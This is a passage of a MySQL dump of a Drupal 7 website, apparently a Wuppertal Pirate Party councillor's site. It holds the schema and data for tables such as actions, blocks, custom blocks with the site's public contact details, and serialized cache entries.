-- MySQL dump 10.13 Distrib 5.5.46, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: -- ------------------------------------------------------ -- Server version 5.5.46-0+deb7u1 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Current Database: `blt` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `blt` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `blt`; -- -- Dumping events for database 'blt' -- -- -- Current Database: `drupal7` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `drupal7` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `drupal7`; -- -- Table structure for table `accesslog` -- DROP TABLE IF EXISTS `accesslog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `accesslog` ( `aid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique accesslog ID.', `sid` varchar(128) NOT NULL DEFAULT '' COMMENT 'Browser session ID of user that visited page.', `title` varchar(255) DEFAULT NULL COMMENT 'Title of page visited.', `path` varchar(255) DEFAULT NULL COMMENT 'Internal path to page visited (relative to Drupal root.)', `url` text COMMENT 'Referrer URI.', `hostname` varchar(128) DEFAULT NULL COMMENT 'Hostname of user that visited the page.', `uid` int(10) unsigned DEFAULT '0' COMMENT 'User users.uid that visited the page.', `timer` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Time in milliseconds that the page took to load.', `timestamp` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Timestamp of when the page was visited.', PRIMARY KEY (`aid`), KEY `accesslog_timestamp` (`timestamp`), KEY `uid` (`uid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores site access information for statistics.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `accesslog` -- LOCK TABLES `accesslog` WRITE; /*!40000 ALTER TABLE `accesslog` DISABLE KEYS */; /*!40000 ALTER TABLE `accesslog` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `actions` -- DROP TABLE IF EXISTS `actions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `actions` ( `aid` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Primary Key: Unique actions ID.', `type` varchar(32) NOT NULL DEFAULT '' COMMENT 'The object that that action acts on (node, user, comment, system or custom types.)', `callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The callback function that executes when the action runs.', `parameters` longblob NOT NULL COMMENT 'Parameters to be passed to the callback function.', `label` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Label of the action.', PRIMARY KEY (`aid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores action information.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `actions` -- LOCK TABLES `actions` WRITE; /*!40000 ALTER TABLE `actions` DISABLE KEYS */; INSERT INTO `actions` VALUES ('comment_publish_action','comment','comment_publish_action','','Publish comment'),('comment_save_action','comment','comment_save_action','','Save comment'),('comment_unpublish_action','comment','comment_unpublish_action','','Unpublish comment'),('node_make_sticky_action','node','node_make_sticky_action','','Make content sticky'),('node_make_unsticky_action','node','node_make_unsticky_action','','Make content unsticky'),('node_promote_action','node','node_promote_action','','Promote content to front page'),('node_publish_action','node','node_publish_action','','Publish content'),('node_save_action','node','node_save_action','','Save content'),('node_unpromote_action','node','node_unpromote_action','','Remove content from front page'),('node_unpublish_action','node','node_unpublish_action','','Unpublish content'),('system_block_ip_action','user','system_block_ip_action','','Ban IP address of current user'),('user_block_user_action','user','user_block_user_action','','Block current user'); /*!40000 ALTER TABLE `actions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `adsense_clicks` -- DROP TABLE IF EXISTS `adsense_clicks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `adsense_clicks` ( `aid` int(11) NOT NULL AUTO_INCREMENT, `ip` varchar(15) DEFAULT '0', `timestamp` int(10) unsigned NOT NULL DEFAULT '0', `path` varchar(255) DEFAULT '', `title` varchar(255) DEFAULT '', `referrer` varchar(255) DEFAULT '', PRIMARY KEY (`aid`), KEY `path` (`path`), KEY `timestamp` (`timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `adsense_clicks` -- LOCK TABLES `adsense_clicks` WRITE; /*!40000 ALTER TABLE `adsense_clicks` DISABLE KEYS */; /*!40000 ALTER TABLE `adsense_clicks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `authmap` -- DROP TABLE IF EXISTS `authmap`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `authmap` ( `aid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique authmap ID.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'User’s users.uid.', `authname` varchar(128) NOT NULL DEFAULT '' COMMENT 'Unique authentication name.', `module` varchar(128) NOT NULL DEFAULT '' COMMENT 'Module which is controlling the authentication.', PRIMARY KEY (`aid`), UNIQUE KEY `authname` (`authname`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores distributed authentication mapping.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `authmap` -- LOCK TABLES `authmap` WRITE; /*!40000 ALTER TABLE `authmap` DISABLE KEYS */; /*!40000 ALTER TABLE `authmap` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `batch` -- DROP TABLE IF EXISTS `batch`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `batch` ( `bid` int(10) unsigned NOT NULL COMMENT 'Primary Key: Unique batch ID.', `token` varchar(64) NOT NULL COMMENT 'A string token generated against the current user’s session id and the batch id, used to ensure that only the user who submitted the batch can effectively access it.', `timestamp` int(11) NOT NULL COMMENT 'A Unix timestamp indicating when this batch was submitted for processing. Stale batches are purged at cron time.', `batch` longblob COMMENT 'A serialized array containing the processing data for the batch.', PRIMARY KEY (`bid`), KEY `token` (`token`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores details about batches (processes that run in...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `batch` -- LOCK TABLES `batch` WRITE; /*!40000 ALTER TABLE `batch` DISABLE KEYS */; /*!40000 ALTER TABLE `batch` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `block` -- DROP TABLE IF EXISTS `block`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `block` ( `bid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique block ID.', `module` varchar(64) NOT NULL DEFAULT '' COMMENT 'The module from which the block originates; for example, ’user’ for the Who’s Online block, and ’block’ for any custom blocks.', `delta` varchar(32) NOT NULL DEFAULT '0' COMMENT 'Unique ID for block within a module.', `theme` varchar(64) NOT NULL DEFAULT '' COMMENT 'The theme under which the block settings apply.', `status` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Block enabled status. (1 = enabled, 0 = disabled)', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Block weight within region.', `region` varchar(64) NOT NULL DEFAULT '' COMMENT 'Theme region within which the block is set.', `custom` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate how users may control visibility of the block. (0 = Users cannot control, 1 = On by default, but can be hidden, 2 = Hidden by default, but can be shown)', `visibility` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate how to show blocks on pages. (0 = Show on all pages except listed pages, 1 = Show only on listed pages, 2 = Use custom PHP code to determine visibility)', `pages` text NOT NULL COMMENT 'Contents of the "Pages" block; contains either a list of paths on which to include/exclude the block or PHP code, depending on "visibility" setting.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'Custom title for the block. (Empty string will use block default title, will remove the title, text will cause block to use specified title.)', `cache` tinyint(4) NOT NULL DEFAULT '1' COMMENT 'Binary flag to indicate block cache mode. (-2: Custom cache, -1: Do not cache, 1: Cache per role, 2: Cache per user, 4: Cache per page, 8: Block cache global) See DRUPAL_CACHE_* constants in ../includes/common.inc for more detailed information.', PRIMARY KEY (`bid`), UNIQUE KEY `tmd` (`theme`,`module`,`delta`), KEY `list` (`theme`,`status`,`region`,`weight`,`module`) ) ENGINE=InnoDB AUTO_INCREMENT=79 DEFAULT CHARSET=utf8 COMMENT='Stores block settings, such as region and visibility...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `block` -- LOCK TABLES `block` WRITE; /*!40000 ALTER TABLE `block` DISABLE KEYS */; INSERT INTO `block` VALUES (1,'system','main','bartik',1,0,'content',0,0,'','',-1),(2,'search','form','bartik',1,-1,'sidebar_first',0,0,'','',-1),(3,'node','recent','seven',1,10,'dashboard_main',0,0,'','',-1),(4,'user','login','bartik',1,0,'sidebar_first',0,0,'','',-1),(5,'system','navigation','bartik',1,0,'sidebar_first',0,0,'','',-1),(6,'system','powered-by','bartik',1,10,'footer',0,0,'','',-1),(7,'system','help','bartik',1,0,'help',0,0,'','',-1),(8,'system','main','seven',1,0,'content',0,0,'','',-1),(9,'system','help','seven',1,0,'help',0,0,'','',-1),(10,'user','login','seven',1,10,'content',0,0,'','',-1),(11,'user','new','seven',1,0,'dashboard_sidebar',0,0,'','',-1),(12,'search','form','seven',1,-10,'dashboard_sidebar',0,0,'','',-1),(13,'comment','recent','bartik',0,0,'-1',0,0,'','',1),(14,'node','syndicate','bartik',0,0,'-1',0,0,'','',-1),(15,'node','recent','bartik',0,0,'-1',0,0,'','',1),(16,'shortcut','shortcuts','bartik',0,0,'-1',0,0,'','',-1),(17,'system','management','bartik',0,0,'-1',0,0,'','',-1),(18,'system','user-menu','bartik',0,0,'-1',0,0,'','',-1),(19,'system','main-menu','bartik',0,0,'-1',0,0,'','',-1),(20,'user','new','bartik',0,0,'-1',0,0,'','',1),(21,'user','online','bartik',0,0,'-1',0,0,'','',-1),(22,'comment','recent','seven',1,0,'dashboard_inactive',0,0,'','',1),(23,'node','syndicate','seven',0,0,'-1',0,0,'','',-1),(24,'shortcut','shortcuts','seven',0,0,'-1',0,0,'','',-1),(25,'system','powered-by','seven',0,10,'-1',0,0,'','',-1),(26,'system','navigation','seven',0,0,'-1',0,0,'','',-1),(27,'system','management','seven',0,0,'-1',0,0,'','',-1),(28,'system','user-menu','seven',0,0,'-1',0,0,'','',-1),(29,'system','main-menu','seven',0,0,'-1',0,0,'','',-1),(30,'user','online','seven',1,0,'dashboard_inactive',0,0,'','',-1),(31,'block','1','bartik',1,0,'sidebar_second',0,0,'','Kontakt',-1),(32,'block','1','seven',0,0,'-1',0,0,'','Kontakt',-1),(33,'block','1','responsive_bartik',1,0,'sidebar_second',0,0,'','Kontakt',-1),(34,'comment','recent','responsive_bartik',0,0,'-1',0,0,'','',1),(35,'node','recent','responsive_bartik',0,0,'-1',0,0,'','',1),(36,'node','syndicate','responsive_bartik',0,0,'-1',0,0,'','',-1),(37,'search','form','responsive_bartik',1,-1,'sidebar_first',0,0,'','',-1),(38,'shortcut','shortcuts','responsive_bartik',0,0,'-1',0,0,'','',-1),(39,'system','help','responsive_bartik',1,0,'help',0,0,'','',-1),(40,'system','main','responsive_bartik',1,0,'content',0,0,'','',-1),(41,'system','main-menu','responsive_bartik',0,0,'-1',0,0,'','',-1),(42,'system','management','responsive_bartik',0,0,'-1',0,0,'','',-1),(43,'system','navigation','responsive_bartik',1,0,'sidebar_first',0,0,'','',-1),(44,'system','powered-by','responsive_bartik',0,10,'-1',0,0,'','',-1),(45,'system','user-menu','responsive_bartik',0,0,'-1',0,0,'','',-1),(46,'user','login','responsive_bartik',1,0,'sidebar_first',0,0,'','',-1),(47,'user','new','responsive_bartik',0,0,'-1',0,0,'','',1),(48,'user','online','responsive_bartik',0,0,'-1',0,0,'','',-1),(49,'block','2','bartik',0,0,'-1',0,0,'','',-1),(50,'block','2','responsive_bartik',1,0,'header',0,0,'','',-1),(51,'block','2','seven',0,0,'-1',0,0,'','',-1),(52,'adsense_managed','0','bartik',0,0,'-1',0,0,'','',-1),(53,'adsense_managed','1','bartik',0,0,'-1',0,0,'','',-1),(54,'adsense_managed','2','bartik',0,0,'-1',0,0,'','',-1),(55,'adsense_oldcode','0','bartik',0,0,'-1',0,0,'','',-1),(56,'adsense_oldcode','1','bartik',0,0,'-1',0,0,'','',-1),(57,'adsense_oldcode','2','bartik',0,0,'-1',0,0,'','',-1),(58,'adsense_managed','0','responsive_bartik',0,0,'-1',0,0,'','',-1),(59,'adsense_managed','1','responsive_bartik',0,0,'-1',0,0,'','',-1),(60,'adsense_managed','2','responsive_bartik',0,0,'-1',0,0,'','',-1),(61,'adsense_oldcode','0','responsive_bartik',0,0,'-1',0,0,'','',-1),(62,'adsense_oldcode','1','responsive_bartik',0,0,'-1',0,0,'','',-1),(63,'adsense_oldcode','2','responsive_bartik',0,0,'-1',0,0,'','',-1),(64,'adsense_managed','0','seven',0,0,'-1',0,0,'','',-1),(65,'adsense_managed','1','seven',0,0,'-1',0,0,'','',-1),(66,'adsense_managed','2','seven',0,0,'-1',0,0,'','',-1),(67,'adsense_oldcode','0','seven',0,0,'-1',0,0,'','',-1),(68,'adsense_oldcode','1','seven',0,0,'-1',0,0,'','',-1),(69,'adsense_oldcode','2','seven',0,0,'-1',0,0,'','',-1),(70,'adsense_cse','0','bartik',0,0,'-1',0,0,'','',-1),(71,'adsense_cse','1','bartik',0,0,'-1',0,0,'','',-1),(72,'adsense_cse','0','responsive_bartik',0,0,'-1',0,0,'','',-1),(73,'adsense_cse','1','responsive_bartik',0,0,'-1',0,0,'','',-1),(74,'adsense_cse','0','seven',0,0,'-1',0,0,'','',-1),(75,'adsense_cse','1','seven',0,0,'-1',0,0,'','',-1),(76,'blog','recent','bartik',0,0,'-1',0,0,'','',1),(77,'blog','recent','responsive_bartik',0,0,'-1',0,0,'','',1),(78,'blog','recent','seven',1,0,'dashboard_inactive',0,0,'','',1); /*!40000 ALTER TABLE `block` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `block_custom` -- DROP TABLE IF EXISTS `block_custom`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `block_custom` ( `bid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The block’s block.bid.', `body` longtext COMMENT 'Block contents.', `info` varchar(128) NOT NULL DEFAULT '' COMMENT 'Block description.', `format` varchar(255) DEFAULT NULL COMMENT 'The filter_format.format of the block body.', PRIMARY KEY (`bid`), UNIQUE KEY `info` (`info`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='Stores contents of custom-made blocks.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `block_custom` -- LOCK TABLES `block_custom` WRITE; /*!40000 ALTER TABLE `block_custom` DISABLE KEYS */; INSERT INTO `block_custom` VALUES (1,'Stadtverordneter\r\nOliver Graf\r\nJohannes Rau Platz 1\r\n42275 Wuppertal\r\n01523/4719093\r\nTwitter: @OlliTal\r\neMail: ollirat@ollital.de','Kontaktdaten','filtered_html'),(2,'Wuppertal Kommunal Piraten ','Header','filtered_html'); /*!40000 ALTER TABLE `block_custom` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `block_node_type` -- DROP TABLE IF EXISTS `block_node_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `block_node_type` ( `module` varchar(64) NOT NULL COMMENT 'The block’s origin module, from block.module.', `delta` varchar(32) NOT NULL COMMENT 'The block’s unique delta within module, from block.delta.', `type` varchar(32) NOT NULL COMMENT 'The machine-readable name of this type from node_type.type.', PRIMARY KEY (`module`,`delta`,`type`), KEY `type` (`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sets up display criteria for blocks based on content types'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `block_node_type` -- LOCK TABLES `block_node_type` WRITE; /*!40000 ALTER TABLE `block_node_type` DISABLE KEYS */; /*!40000 ALTER TABLE `block_node_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `block_role` -- DROP TABLE IF EXISTS `block_role`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `block_role` ( `module` varchar(64) NOT NULL COMMENT 'The block’s origin module, from block.module.', `delta` varchar(32) NOT NULL COMMENT 'The block’s unique delta within module, from block.delta.', `rid` int(10) unsigned NOT NULL COMMENT 'The user’s role ID from users_roles.rid.', PRIMARY KEY (`module`,`delta`,`rid`), KEY `rid` (`rid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sets up access permissions for blocks based on user roles'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `block_role` -- LOCK TABLES `block_role` WRITE; /*!40000 ALTER TABLE `block_role` DISABLE KEYS */; /*!40000 ALTER TABLE `block_role` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `blocked_ips` -- DROP TABLE IF EXISTS `blocked_ips`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `blocked_ips` ( `iid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: unique ID for IP addresses.', `ip` varchar(40) NOT NULL DEFAULT '' COMMENT 'IP address', PRIMARY KEY (`iid`), KEY `blocked_ip` (`ip`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores blocked IP addresses.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `blocked_ips` -- LOCK TABLES `blocked_ips` WRITE; /*!40000 ALTER TABLE `blocked_ips` DISABLE KEYS */; /*!40000 ALTER TABLE `blocked_ips` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache` -- DROP TABLE IF EXISTS `cache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Generic cache table for caching things not separated out...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache` -- LOCK TABLES `cache` WRITE; /*!40000 ALTER TABLE `cache` DISABLE KEYS */; INSERT INTO `cache` VALUES ('entity_info:en','a:6:{s:7:\"comment\";a:14:{s:5:\"label\";s:7:\"Comment\";s:10:\"base table\";s:7:\"comment\";s:12:\"uri callback\";s:11:\"comment_uri\";s:9:\"fieldable\";b:1;s:16:\"controller class\";s:17:\"CommentController\";s:11:\"entity keys\";a:5:{s:2:\"id\";s:3:\"cid\";s:6:\"bundle\";s:9:\"node_type\";s:5:\"label\";s:7:\"subject\";s:8:\"language\";s:8:\"language\";s:8:\"revision\";s:0:\"\";}s:7:\"bundles\";a:3:{s:20:\"comment_node_article\";a:4:{s:5:\"label\";s:15:\"Article comment\";s:11:\"node bundle\";s:7:\"article\";s:5:\"admin\";a:4:{s:4:\"path\";s:55:\"admin/structure/types/manage/%comment_node_type/comment\";s:15:\"bundle argument\";i:4;s:9:\"real path\";s:44:\"admin/structure/types/manage/article/comment\";s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:8:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:13:\"sioct:Comment\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:12:\"comment_body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"pid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"sioc:reply_of\";}s:4:\"type\";s:3:\"rel\";}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}}}s:17:\"comment_node_page\";a:4:{s:5:\"label\";s:18:\"Basic page comment\";s:11:\"node bundle\";s:4:\"page\";s:5:\"admin\";a:4:{s:4:\"path\";s:55:\"admin/structure/types/manage/%comment_node_type/comment\";s:15:\"bundle argument\";i:4;s:9:\"real path\";s:41:\"admin/structure/types/manage/page/comment\";s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:8:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:13:\"sioct:Comment\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:12:\"comment_body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"pid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"sioc:reply_of\";}s:4:\"type\";s:3:\"rel\";}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}}}s:17:\"comment_node_blog\";a:4:{s:5:\"label\";s:18:\"Blog entry comment\";s:11:\"node bundle\";s:4:\"blog\";s:5:\"admin\";a:4:{s:4:\"path\";s:55:\"admin/structure/types/manage/%comment_node_type/comment\";s:15:\"bundle argument\";i:4;s:9:\"real path\";s:41:\"admin/structure/types/manage/blog/comment\";s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:8:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:13:\"sioct:Comment\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:12:\"comment_body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"pid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"sioc:reply_of\";}s:4:\"type\";s:3:\"rel\";}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}}}}s:10:\"view modes\";a:1:{s:4:\"full\";a:2:{s:5:\"label\";s:12:\"Full comment\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:0;s:11:\"field cache\";b:1;s:9:\"load hook\";s:12:\"comment_load\";s:11:\"translation\";a:0:{}s:22:\"base table field types\";a:14:{s:3:\"cid\";s:6:\"serial\";s:3:\"pid\";s:3:\"int\";s:3:\"nid\";s:3:\"int\";s:3:\"uid\";s:3:\"int\";s:7:\"subject\";s:7:\"varchar\";s:8:\"hostname\";s:7:\"varchar\";s:7:\"created\";s:3:\"int\";s:7:\"changed\";s:3:\"int\";s:6:\"status\";s:3:\"int\";s:6:\"thread\";s:7:\"varchar\";s:4:\"name\";s:7:\"varchar\";s:4:\"mail\";s:7:\"varchar\";s:8:\"homepage\";s:7:\"varchar\";s:8:\"language\";s:7:\"varchar\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:14:{i:0;s:3:\"cid\";i:1;s:3:\"pid\";i:2;s:3:\"nid\";i:3;s:3:\"uid\";i:4;s:7:\"subject\";i:5;s:8:\"hostname\";i:6;s:7:\"created\";i:7;s:7:\"changed\";i:8;s:6:\"status\";i:9;s:6:\"thread\";i:10;s:4:\"name\";i:11;s:4:\"mail\";i:12;s:8:\"homepage\";i:13;s:8:\"language\";}}}s:4:\"node\";a:16:{s:5:\"label\";s:4:\"Node\";s:16:\"controller class\";s:14:\"NodeController\";s:10:\"base table\";s:4:\"node\";s:14:\"revision table\";s:13:\"node_revision\";s:12:\"uri callback\";s:8:\"node_uri\";s:9:\"fieldable\";b:1;s:11:\"entity keys\";a:5:{s:2:\"id\";s:3:\"nid\";s:8:\"revision\";s:3:\"vid\";s:6:\"bundle\";s:4:\"type\";s:5:\"label\";s:5:\"title\";s:8:\"language\";s:8:\"language\";}s:11:\"bundle keys\";a:1:{s:6:\"bundle\";s:4:\"type\";}s:7:\"bundles\";a:3:{s:7:\"article\";a:3:{s:5:\"label\";s:7:\"Article\";s:5:\"admin\";a:4:{s:4:\"path\";s:39:\"admin/structure/types/manage/%node_type\";s:9:\"real path\";s:36:\"admin/structure/types/manage/article\";s:15:\"bundle argument\";i:4;s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:11:{s:11:\"field_image\";a:2:{s:10:\"predicates\";a:2:{i:0;s:8:\"og:image\";i:1;s:12:\"rdfs:seeAlso\";}s:4:\"type\";s:3:\"rel\";}s:10:\"field_tags\";a:2:{s:10:\"predicates\";a:1:{i:0;s:10:\"dc:subject\";}s:4:\"type\";s:3:\"rel\";}s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Item\";i:1;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}}s:4:\"page\";a:3:{s:5:\"label\";s:10:\"Basic page\";s:5:\"admin\";a:4:{s:4:\"path\";s:39:\"admin/structure/types/manage/%node_type\";s:9:\"real path\";s:33:\"admin/structure/types/manage/page\";s:15:\"bundle argument\";i:4;s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content 